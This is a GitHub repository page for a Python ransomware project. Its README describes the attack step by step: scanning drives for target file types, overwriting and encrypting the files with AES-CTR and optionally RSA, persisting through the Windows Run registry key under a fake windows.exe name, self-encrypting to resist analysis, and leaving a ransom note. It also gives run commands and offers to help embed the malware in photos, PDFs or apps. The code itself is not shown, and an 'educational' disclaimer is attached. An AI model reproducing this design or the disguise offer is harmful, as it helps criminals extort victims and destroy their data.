Skip to content

This is the source code of real RansomWare but and it's commented not to harm your device

Notifications You must be signed in to change notification settings

hossamshady11/RansomWare

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
 
 
 
 

Repository files navigation

RansomeWare


"This is a real ransomeware , its code is fully commented not to harm your device and that is for only educational purpose " I'm not responsible for the misuse of this ransome


explaining the tecneque of the ransome

first the python script used to scan the files of the device with the extensions of the list put
in the script then it returns all thpahts of these extensions and you can put the path that you
wanna begain from i have selected C:\ and after that taking the result to the enc function which
is responsible for encrypting and reading the files and i used the tecnique of deleting the content
of the file that is imposible to return data cause the space was busy then after that making key of
encryption and it is AES with counter mode and if you want it more advanced you can encrypt the key
by using RSA encrytion. here are many things advanced like making file encryptitself after finishing
its task to prevent anyone from analysing it

the most advanced method of preventing the ransome from encrypting data many times I copied the path of
it to appdata with windows.exe and moved it to the memory of HKCU\Software\Microsoft\Windows\CurrentVersion\Run
to make it encrypt all the new files and data every time the device restart and make it impossible to be
killed before encrypting itself it makes messge for the user in desktop containg all the details the hacker
want from the victim


installion

if you using linux :-

#git clone https://github.com/enghossamshady/RansomWare.git
#cd RansomWare
#chmod +x HosRansom.py
you can edit on it before running it but don't do that on your personal pc
#./HosRansom.py

if you wanna merge it on photo or pdf or app please contact me below

read and run

if you are using #windows use notepad to open the file or any python editors if you wanna run that file you can go its location and double click on it or go to cmd
and use python Ransomware.py


** you can contact me on my :- or on twitter: www.twitter.com/Hossam59215885

About

This is the source code of real RansomWare but and it's commented not to harm your device

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages